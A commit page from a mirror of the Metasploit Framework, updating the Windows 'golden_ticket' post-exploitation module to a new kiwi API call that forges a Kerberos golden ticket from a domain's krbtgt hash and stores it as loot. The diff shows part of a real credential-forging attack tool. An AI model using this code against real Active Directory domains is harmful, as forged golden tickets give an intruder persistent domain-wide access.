infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update the golden ticket module to work with new kiwi

bug/bundler_fix
OJ 2016-12-23 10:30:06 +10:00
parent 93a280dfc1
commit 18e69b85af
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
1 changed files with 9 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/post/windows/escalate/golden_ticket.rb
View File

@ -52,9 +52,6 @@ class MetasploitModule < Msf::Post
domain_sid = datastore['SID'] domain_sid = datastore['SID']
id = datastore['ID'] || 0 id = datastore['ID'] || 0
groups = []
groups = datastore['GROUPS'].split(',').map(&:to_i) if datastore['GROUPS']
unless domain unless domain
print_status('Searching for the domain...') print_status('Searching for the domain...')
domain = get_domain domain = get_domain
@ -103,12 +100,19 @@ class MetasploitModule < Msf::Post
end end
print_status("Creating Golden Ticket for #{domain}\\#{user}...") print_status("Creating Golden Ticket for #{domain}\\#{user}...")
ticket = client.kiwi.golden_ticket_create(user, domain, domain_sid, krbtgt_hash, id, groups) ticket = client.kiwi.golden_ticket_create({
user: user,
domain_name: domain,
domain_sid: domain_sid,
krbtgt_hash: krbtgt_hash,
id: id,
group_ids: datastore['GROUPS']
})
if ticket if ticket
print_good('Golden Ticket Obtained!') print_good('Golden Ticket Obtained!')
ticket_location = store_loot("golden.ticket", ticket_location = store_loot("golden.ticket",
"binary/kirbi", "base64/kirbi",
session, session,
ticket, ticket,
"#{domain}\\#{user}-golden_ticket.kirbi", "#{domain}\\#{user}-golden_ticket.kirbi",